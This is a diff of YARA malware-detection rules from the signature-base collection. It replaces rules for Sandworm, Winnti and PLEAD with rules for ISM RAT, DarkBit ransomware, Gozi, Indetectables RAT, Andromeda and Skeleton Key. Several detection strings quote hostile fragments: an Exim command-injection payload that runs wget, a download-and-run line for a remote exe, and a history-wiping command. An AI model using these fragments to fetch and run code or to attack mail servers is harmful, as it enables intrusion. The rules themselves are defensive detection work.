+		hash1 = "9d0165e0484c31bd4ea467650b2ae2f359f67ae1016af49326bb374cead5f789"
 
 	strings:
-		$typo1 = "/sbin/init | awk "
-		$typo2 = "Syslog service for monitoring \n"
-		$typo3 = "Error.Can't update app! Not enough update archive."
-		$typo4 = ":\"metod\""
+		$code1 = {F6 50 04 48 FF C0 48 39 D0 75 F5}
+		$code2 = {88 01 48 FF C1 8A 11 89 C8 29 F8 84 D2 0F 85}
+		$str1 = "/proc/self/exe" fullword ascii
+		$str2 = "%-23s %-23s %-23s %-23s %-23s %s" fullword ascii
+		$str3 = "pam_sm_authenticate" ascii
+		$str_fr1 = "HISTFILE=/dev/null"
 
 	condition:
-		3 of ( $typo* )
+		uint32( 0 ) == 0x464c457f and filesize < 100KB and ( all of ( $code* ) or all of ( $str* ) )
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Strings
+rule SIGNATURE_BASE_Trojan_ISMRAT_Gen : FILE
 {
 	meta:
-		description = "Detects Strings used by Exaramel malware"
-		author = "FR/ANSSI/SDO (composed from 4 saparate rules by Florian Roth)"
-		id = "fdc79b87-eb9e-5751-9474-ff653b073165"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L204-L232"
+		description = "ISM RAT"
+		author = "Ahmed Zaki"
+		id = "e72241ce-d6ee-5cb7-a83d-157161938d83"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2017/february/ism-rat/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ism_rat.yar#L9-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9d2790e60184ed973b2735263d0a997f32af0beacc9ea8ef65926fe6507011d5"
-		score = 80
+		logic_hash = "c4d26f79b8110e92a5e427de303eca6eaf79765a4c9cc437864dc5160ef2e343"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "146a112cb01cd4b8e06d36304f6bdf7b"
+		hash2 = "fa3dbe37108b752c38bf5870b5862ce5"
+		hash3 = "bf4b07c7b4a4504c4192bd68476d63b5"
 
 	strings:
-		$persistence1 = "systemd"
-		$persistence2 = "upstart"
-		$persistence3 = "systemV"
-		$persistence4 = "freebsd rc"
-		$report1 = "systemdupdate.rep"
-		$report2 = "upstartupdate.rep"
-		$report3 = "remove.rep"
-		$url1 = "/tasks.get/"
-		$url2 = "/time.get/"
-		$url3 = "/time.set"
-		$url4 = "/tasks.report"
-		$url5 = "/attachment.get/"
-		$url6 = "/auth/app"
+		$s1 = "WinHTTP Example/1.0" wide
+		$s2 = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0" wide
+		$s3 = "|||Command executed successfully"
+		$dir = /Microsoft\\Windows\\Tmpe[a-z0-9]{2,8}/
 
 	condition:
-		(5 of ( $url* ) and all of ( $persistence* ) ) or ( all of ( $persistence* ) and all of ( $report* ) ) or ( 5 of ( $url* ) and all of ( $report* ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_SUSP_BAT2EXE_Bdargo_Converted_BAT : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_Darkbit_Feb23_1 : FILE
 {
 	meta:
-		description = "Detects binaries created with BDARGO Advanced BAT to EXE converter"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c9da4184-1530-5525-bdba-2dcc8a221bb1"
-		date = "2018-07-28"
-		modified = "2022-06-23"
-		reference = "https://www.majorgeeks.com/files/details/advanced_bat_to_exe_converter.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_bat2exe.yar#L2-L24"
+		description = "Detects indicators found in DarkBit ransomware"
+		author = "Florian Roth"
+		id = "d209a0c2-f649-5fb1-9ecd-f1c35caa796f"
+		date = "2023-02-13"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/idonaor1/status/1624703255770005506?s=12&t=mxHaauzwR6YOj5Px8cIeIw"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_darkbit_feb23.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "978aa25f1abd0cbd36e55da2b1ed4478a3a5b8b814988669c70e219cc2dd1afd"
-		score = 45
+		logic_hash = "ba1baea7cb7362160c4b00b0355000a789b238c1ec82b840479c04028e6ca3ab"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d428d79f58425d831c2ee0a73f04749715e8c4dd30ccd81d92fe17485e6dfcda"
-		hash1 = "a547a02eb4fcb8f446da9b50838503de0d46f9bb2fd197c9ff63021243ea6d88"
 
 	strings:
-		$s1 = "Error #bdembed1 -- Quiting" fullword ascii
-		$s2 = "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" fullword ascii
-		$s3 = "\\a.txt" ascii
-		$s4 = "command.com" fullword ascii
-		$s6 = "DFDHERGDCV" fullword ascii
-		$s7 = "DFDHERGGZV" fullword ascii
-		$s8 = "%s%s%s%s%s%s%s%s" fullword ascii
+		$s1 = ".onion" ascii
+		$s2 = "GetMOTWHostUrl"
+		$x1 = "hus31m7c7ad.onion"
+		$x2 = "iw6v2p3cruy"
+		$xn1 = "You will receive decrypting key after the payment."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 10MB and ( 1 of ( $x* ) or 2 of them ) or 4 of them or ( filesize < 10MB and $xn1 )
 }
-rule SIGNATURE_BASE_APT_MAL_Winntilinux_Dropper_Azazelfork_May19 : AZAZEL_FORK FILE
+rule SIGNATURE_BASE_MAL_RANSOM_Darkbit_Feb23_2 : FILE
 {
 	meta:
-		description = "Detection of Linux variant of Winnti"
-		author = "Silas Cutler (havex [@] chronicle.security), Chronicle Security"
-		id = "d641de9a-e563-5067-b7e4-0aa83a087ed4"
-		date = "2019-05-15"
+		description = "Detects Go based DarkBit ransomware (garbled code; could trigger on other obfuscated samples, too)"
+		author = "Florian Roth"
+		id = "f530815c-68e7-55f1-8e36-bc74a1059584"
+		date = "2023-02-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_linux.yar#L1-L16"
+		reference = "https://www.hybrid-analysis.com/sample/9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff?environmentId=160"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_darkbit_feb23.yar#L25-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4741c2884d1ca3a40dadd3f3f61cb95a59b11f99a0f980dbadc663b85eb77a2a"
-		logic_hash = "0af32675dccfd0ad0c7919683fddced6ad49c65800ffa523773b7342b431379f"
+		logic_hash = "577435536300902811612a3415e82420574c98345b91b21fb2bfd2bfde396bec"
 		score = 75
 		quality = 85
-		tags = "AZAZEL_FORK, FILE"
-		version = "1.0"
-		TLP = "White"
+		tags = "FILE"
+		hash1 = "9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff"
 
 	strings:
-		$config_decr = { 48 89 45 F0 C7 45 EC 08 01 00 00 C7 45 FC 28 00 00 00 EB 31 8B 45 FC 48 63 D0 48 8B 45 F0 48 01 C2 8B 45 FC 48 63 C8 48 8B 45 F0 48 01 C8 0F B6 00 89 C1 8B 45 F8 89 C6 8B 45 FC 01 F0 31 C8 88 02 83 45 FC 01 }
-		$export1 = "our_sockets"
-		$export2 = "get_our_pids"
+		$s1 = "runtime.initLongPathSupport" ascii fullword
+		$s2 = "reflect." ascii
+		$s3 = "    \"processes\": []," ascii fullword
+		$s4 = "^!* %!(!" ascii fullword
+		$op1 = { 4d 8b b6 00 00 00 00 48 8b 94 24 40 05 00 00 31 c0 87 82 30 03 00 00 b8 01 00 00 00 f0 0f c1 82 00 03 00 00 48 8b 44 24 48 48 8b 0d ba 1f 32 00 }
+		$op2 = { 49 8d 49 01 0f 1f 00 48 39 d9 7c e2 b9 0b 00 00 00 49 89 d8 e9 28 fc ff ff e8 89 6c d7 ff }
 
 	condition:
-		uint16( 0 ) == 0x457f and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 20000KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Winntilinux_Main_Azazelfork_May19 : FILE
+rule SIGNATURE_BASE_MAL_Gozicrypter_Dec20_1 : FILE
 {
 	meta:
-		description = "Detection of Linux variant of Winnti"
-		author = "Silas Cutler (havex [@] chronicle.security), Chronicle Security"
-		id = "a1693e2d-4d89-5cc7-ab14-c8feb000638a"
-		date = "2019-05-15"
+		description = "Detects crypter associated with several Gozi samples"
+		author = "James Quinn"
+		id = "d4a48612-fa6f-5f03-8d27-5f6b79b2a070"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_linux.yar#L18-L39"
+		reference = "YaraExchange"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_gozi_crypter.yar#L2-L13"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23"
-		logic_hash = "3ff38795179f6c32f2ff014b06ac126ae3a0de3fe7515f0e49f12f9c8ff14b43"
-		score = 75
+		logic_hash = "51fdfbb59b8f52cc2ff89d994c0f89d2c2895c346b098879c68b4ccb880783c1"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		TLP = "White"
 
 	strings:
-		$uuid_lookup = "/usr/sbin/dmidecode  | grep -i 'UUID' |cut -d' ' -f2 2>/dev/null"
-		$dbg_msg = "[advNetSrv] can not create a PF_INET socket"
-		$rtti_name1 = "CNetBase"
-		$rtti_name2 = "CMyEngineNetEvent"
-		$rtti_name3 = "CBufferCache"
-		$rtti_name4 = "CSocks5Base"
-		$rtti_name5 = "CDataEngine"
-		$rtti_name6 = "CSocks5Mgr"
-		$rtti_name7 = "CRemoteMsg"
+		$s1 = { 89 05 ?? ?? ?? ?? 81 2d ?? ?? ?? ?? 01 00 00 00 81 3D ?? ?? ?? ?? 00 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x457f and ( ( $dbg_msg and 1 of ( $rtti* ) ) or ( 5 of ( $rtti* ) ) or ( $uuid_lookup and 2 of ( $rtti* ) ) )
+		uint16( 0 ) == 0x5A4D and any of them and filesize < 1000KB
 }
-rule SIGNATURE_BASE_Apt_Win32_Dll_Rat_1A53B0Cp32E46G0Qio7 : FILE
+rule SIGNATURE_BASE_Indetectables_RAT : FILE
 {
 	meta:
-		description = "Detects Inocnation Malware"
-		author = "Fidelis Cybersecurity"
-		id = "1f2250b7-fee4-5031-aeba-90d35319b560"
-		date = "2023-12-05"
+		description = "Detects Indetectables RAT based on strings found in research by Paul Rascagneres & Ronan Mouchoux"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f8322822-617c-50cf-8b64-60da3a202ca5"
+		date = "2015-10-01"
 		modified = "2023-12-05"
-		reference = "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_inocnation.yar#L1-L30"
+		reference = "http://www.sekoia.fr/blog/when-a-brazilian-string-smells-bad/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_indetectables_rat.yar#L8-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "824997d8c8845838420f226b60de544f33a50327fa67aea472de6eaf1b6b4492"
+		logic_hash = "840a0c92ac731d9e88d0bdccb39598e4ff476e8630ec08f6c4024a31e258ebd0"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
-		hash2 = "d9821468315ccd3b9ea03161566ef18e"
-		hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "081905074c19d5e32fd41a24b4c512d8fd9d2c3a8b7382009e3ab920728c7105"
+		hash2 = "66306c2a55a3c17b350afaba76db7e91bfc835c0e90a42aa4cf59e4179b80229"
+		hash3 = "1fa810018f6dd169e46a62a4f77ae076f93a853bfc33c7cf96266772535f6801"
 
 	strings:
-		$s1 = { c7 [2] 64 00 63 00 c7 [2] 69 00 62 00 c7 [2] 7a 00 7e 00 c7 [2] 2d 00 43 00 c7 [2] 59 00 2d 00 c7 [2] 3b 00 23 00 c7 [2] 3e 00 36 00 c7 [2] 2d 00 5a 00 c7 [2] 42 00 5a 00 c7 [2] 3b 00 39 00 c7 [2] 36 00 2d 00 c7 [2] 59 00 7f 00 c7 [2] 64 00 69 00 c7 [2] 68 00 63 00 c7 [2] 79 00 22 00 c7 [2] 3a 00 23 00 c7 [2] 3d 00 36 00 c7 [2] 2d 00 7f 00 c7 [2] 7b 00 37 00 c7 [2] 3c 00 3c 00 c7 [2] 23 00 3d 00 c7 [2] 24 00 2d 00 c7 [2] 61 00 64 00 c7 [2] 66 00 68 00 c7 [2] 2d 00 4a 00 c7 [2] 68 00 6e 00 c7 [2] 66 00 62 00 }
-		$s2 = { c7 [2] 23 00 24 00 c7 [2] 24 00 33 00 c7 [2] 38 00 22 00 c7 [2] 00 00 33 00 c7 [2] 24 00 25 00 c7 [2] 3f 00 39 00 c7 [2] 38 00 0a 00 c7 [2] 04 00 23 00 c7 [2] 38 00 00 00 c7 [2] 43 00 66 00 c7 [2] 6d 00 60 00 c7 [2] 67 00 52 00 c7 [2] 6e 00 63 00 c7 [2] 7b 00 67 00 c7 [2] 70 00 00 00 c7 [2] 43 00 4d 00 c7 [2] 44 00 00 00 c7 [2] 0f 00 43 00 c7 [2] 00 00 50 00 c7 [2] 49 00 4e 00 c7 [2] 47 00 00 00 c7 [2] 11 00 12 00 c7 [2] 17 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 11 00 06 00 c7 [2] 44 00 45 00 c7 [2] 4c 00 00 00 }
-		$s3 = { 66 [4-7] 0d 40 83 f8 44 7c ?? }
-		$s4 = { 66 [4-7] 14 40 83 f8 14 7c ?? }
-		$s5 = { 66 [4-7] 56 40 83 f8 2d 7c ?? }
-		$s6 = { 66 [4-7] 20 40 83 f8 1a 7c ?? }
-		$s7 = { 80 [2-7] 2e 40 3d 50 02 00 00 72 ?? }
-		$s8 = "%08x%08x%08x%08x" wide ascii
-		$s9 = "WinHttpGetIEProxyConfigForCurrentUser" wide ascii
+		$s1 = "Coded By M3" fullword wide
+		$s2 = "Stub Undetector M3" fullword wide
+		$s3 = "www.webmenegatti.com.br" wide
+		$s4 = "M3n3gatt1" fullword wide
+		$s5 = "TheMisterFUD" fullword wide
+		$s6 = "KillZoneKillZoneKill" fullword ascii
+		$s7 = "[[__M3_F_U_D_M3__]]$" fullword ascii
+		$s8 = "M3_F_U_D_M3" ascii
+		$s9 = "M3n3gatt1hack3r" fullword wide
+		$s10 = "M3n3gatt1hack3r" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint32( 0 ) == 0x464c457f ) and ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 1 of them
 }
-rule SIGNATURE_BASE_PLEAD_Downloader_Jun18_1 : FILE
+rule SIGNATURE_BASE_Bergsilva_Malware : FILE
 {
 	meta:
-		description = "Detects PLEAD Downloader"
+		description = "Detects a malware from the same author as the Indetectables RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "19d588d8-1f03-5f34-b82e-b645c28a19a4"
-		date = "2018-06-16"
+		id = "5f35aea6-1d80-594a-a6e0-8e8bb30bc358"
+		date = "2015-10-01"
 		modified = "2023-12-05"
-		reference = "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_plead_downloader.yar#L1-L21"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_indetectables_rat.yar#L35-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "82fa4629aeb67a657af8b40527414e59d1c45a7c4e3c68398d3472c080c9487b"
+		logic_hash = "03b823040a057ffbef9bcb3094a672fd75e141f3e82c77548adbe1c465d329fb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a26df4f62ada084a596bf0f603691bc9c02024be98abec4a9872f0ff0085f940"
+		super_rule = 1
+		hash1 = "00e175cbad629ee118d01c49c11f3d8b8840350d2dd6d16bd81e47ae926f641e"
+		hash2 = "6b4cbbee296e4a0e867302f783d25d276b888b1bf1dcab9170e205d276c22cfc"
 
 	strings:
-		$s1 = "%02d:%02d:%02d" ascii fullword
-		$s2 = "%02d-%02d-%02d" ascii fullword
-		$s3 = "1111%02d%02d%02d_%02d%02d2222" ascii fullword
-		$a1 = "Scanning..." wide fullword
-		$a2 = "Checking..." wide fullword
+		$x1 = "C:\\Users\\Berg Silva\\Desktop\\" wide
+		$x2 = "URLDownloadToFileA 0, \"https://dl.dropbox.com/u/105015858/nome.exe\", \"c:\\nome.exe\", 0, 0" fullword wide
+		$s1 = " Process.Start (Path.GetTempPath() & \"name\" & \".exe\") 'start server baixado" fullword wide
+		$s2 = "FileDelete(@TempDir & \"\\nome.exe\") ;Deleta o Arquivo para que possa ser executado normalmente" fullword wide
+		$s3 = " Lib \"\\WINDOWS\\system32\\UsEr32.dLl\"" fullword wide
+		$s4 = "$Directory = @TempDir & \"\\nome.exe\" ;Define a variavel" fullword wide
+		$s5 = "https://dl.dropbox.com/u/105015858" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) or ( 2 of ( $s* ) and 1 of ( $a* ) ) )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 2 of ( $s* ) )
 }
-rule SIGNATURE_BASE_VULN_PUA_GIGABYTE_Driver_Jul22_1 : FILE
+rule SIGNATURE_BASE_Andromeda_Malbot_Jun_1A : FILE
 {
 	meta:
-		description = "Detects a vulnerable GIGABYTE driver sometimes used by malicious actors to escalate privileges"
+		description = "Detects a malicious Worm Andromeda / RETADUP"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c66b858f-a034-53e1-b0fd-e48693fc6913"
-		date = "2022-07-25"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/malmoeb/status/1551449425842786306"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_gigabyte_driver.yar#L2-L28"
+		id = "42ee6ba3-85ea-5369-bd9b-8ffdec6e17bc"
+		date = "2017-06-30"
+		modified = "2022-12-21"
+		reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_andromeda_jun17.yar#L12-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8aeae559b52b8e01ceab8caba24653b949b3bec694a14b36c819b0a7c9f8b7c6"
-		score = 65
+		logic_hash = "5958608ad5527628c4b6cbe08badbff39a50dcdb6cf603f6fbb5fa32ef61c0c7"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9"
+		hash2 = "73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98"
+		hash3 = "66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4"
+		hash4 = "42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed"
 
 	strings:
-		$xc1 = { 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73
-               00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 32
-               00 2E 00 33 00 37 00 39 00 30 00 2E 00 31 00 38
-               00 33 00 30 00 20 00 62 00 75 00 69 00 6C 00 74
-               00 20 00 62 00 79 00 3A 00 20 00 57 00 69 00 6E
-               00 44 00 44 00 4B 00 00 00 00 00 32 00 09 00 01
-               00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C
-               00 4E 00 61 00 6D 00 65 00 00 00 67 00 64 00 72
-               00 76 00 2E 00 73 00 79 00 73 }
-		$x1 = "AEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAuADIALgAzADcAOQAwAC4AMQA4ADMAMAAgAGIAdQBpAGwAdAAgAGIAeQA6ACAAVwBpAG4ARABEAEsAAAAAADIACQABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAZwBkAHIAdgAuAHMAeQBz"
-		$x2 = "BGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADUALgAyAC4AMwA3ADkAMAAuADEAOAAzADAAIABiAHUAaQBsAHQAIABiAHkAOgAgAFcAaQBuAEQARABLAAAAAAAyAAkAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAGcAZAByAHYALgBzAHkAc"
-		$x3 = "ARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAA1AC4AMgAuADMANwA5ADAALgAxADgAMwAwACAAYgB1AGkAbAB0ACAAYgB5ADoAIABXAGkAbgBEAEQASwAAAAAAMgAJAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABnAGQAcgB2AC4AcwB5AH"
+		$x1 = "%temp%\\FolderN\\name.exe" fullword wide
+		$x2 = "%temp%\\FolderN\\name.exe.lnk" fullword wide
+		$x3 = "\\Startup\\name.exe" wide
+		$x4 = "firefox.exe.exe" fullword wide
+		$x5 = "\\Desktop\\New folder\\dark.exe" wide
+		$x6 = "\\x86\\Release\\word.pdb" ascii
+		$x7 = "\\obj\\Release\\botkill.pdb" ascii
+		$s1 = "4System.Web.Services.Protocols.SoapHttpClientProtocol" fullword ascii
+		$s2 = "svhost.exe" fullword wide
 
 	condition:
-		filesize < 4000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_APT_Sandworm_Keywords_May20_1 : CVE_2019_10149 FILE
+rule SIGNATURE_BASE_Skeleton_Key_Patcher
 {
 	meta:
-		description = "Detects commands used by Sandworm group to exploit critical vulernability CVE-2019-10149 in Exim"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e0d4e90e-5547-5487-8d0c-a141d88fff7c"
-		date = "2020-05-28"
+		description = "Skeleton Key Patcher from Dell SecureWorks Report http://goo.gl/aAk3lN"
+		author = "Dell SecureWorks Counter Threat Unit"
+		id = "a2805cce-7605-58a4-85ce-9dff5586858e"
+		date = "2015-01-13"
 		modified = "2023-12-05"
-		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L2-L15"
+		reference = "http://goo.gl/aAk3lN"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_skeletonkey.yar#L3-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9f9a81ff0c576f05ac063eaca7a5882dbdb09c9a0778610cca2864636a00efce"
-		score = 75
+		logic_hash = "451b77152e38a120bd8d8a832f0f7c003974113ead18aabfe043a332fb1f484c"
+		score = 70
 		quality = 85
-		tags = "CVE-2019-10149, FILE"
+		tags = ""
 
 	strings:
-		$x1 = "MAIL FROM:<$(run("
-		$x2 = "exec\\x20\\x2Fusr\\x2Fbin\\x2Fwget\\x20\\x2DO\\x20\\x2D\\x20http"
+		$target_process = "lsass.exe" wide
+		$dll1 = "cryptdll.dll"
+		$dll2 = "samsrv.dll"
+		$name = "HookDC.dll"
+		$patched1 = "CDLocateCSystem"
+		$patched2 = "SamIRetrievePrimaryCredentials"
+		$patched3 = "SamIRetrieveMultiplePrimaryCredentials"
 
 	condition:
-		filesize < 8000KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_Sandworm_SSH_Key_May20_1 : FILE
+rule SIGNATURE_BASE_Skeleton_Key_Injected_Code
 {
 	meta:
-		description = "Detects SSH key used by Sandworm on exploited machines"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ea2968b8-7ae4-56b8-9547-816c5e37c50a"
-		date = "2020-05-28"
+		description = "Skeleton Key injected Code http://goo.gl/aAk3lN"
+		author = "Dell SecureWorks Counter Threat Unit"
+		id = "29daaffa-cd9d-55d3-b79d-cde1c76e9e45"
+		date = "2015-01-13"
 		modified = "2023-12-05"
-		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L17-L31"
+		reference = "http://goo.gl/aAk3lN"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_skeletonkey.yar#L26-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "23a43849dfaa80bad2ca4f46b53181b3a4855ee89673ae9b658c854069b9aaa9"
-		score = 75
+		logic_hash = "e87cb9a49d0df6f75ca1ae51f8255ea476b699e82d525d7eca06bfda3462d84b"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
-		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+		tags = ""
 
 	strings:
-		$x1 = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2q/NGN/brzNfJiIp2zswtL33tr74pIAjMeWtXN1p5Hqp5fTp058U1EN4NmgmjX0KzNjjV"
+		$injected = { 33 C0 85 C9 0F 95 C0 48 8B 8C 24 40 01 00 00 48 33 CC E8 4D 02 00 00 48 81 C4 58 01 00 00 C3 }
+		$patch_CDLocateCSystem = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 8B FA 8B F1 E8 ?? ?? ?? ?? 48 8B D7 8B CE 48 8B D8 FF 50 10 44 8B D8 85 C0 0F 88 A5 00 00 00 48 85 FF 0F 84 9C 00 00 00 83 FE 17 0F 85 93 00 00 00 48 8B 07 48 85 C0 0F 84 84 00 00 00 48 83 BB 48 01 00 00 00 75 73 48 89 83 48 01 00 00 33 D2 }
+		$patch_SamIRetrievePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 49 8B F9 49 8B F0 48 8B DA 48 8B E9 48 85 D2 74 2A 48 8B 42 08 48 85 C0 74 21 66 83 3A 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 14 E8 ?? ?? ?? ?? 4C 8B CF 4C 8B C6 48 8B D3 48 8B CD FF 50 18 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
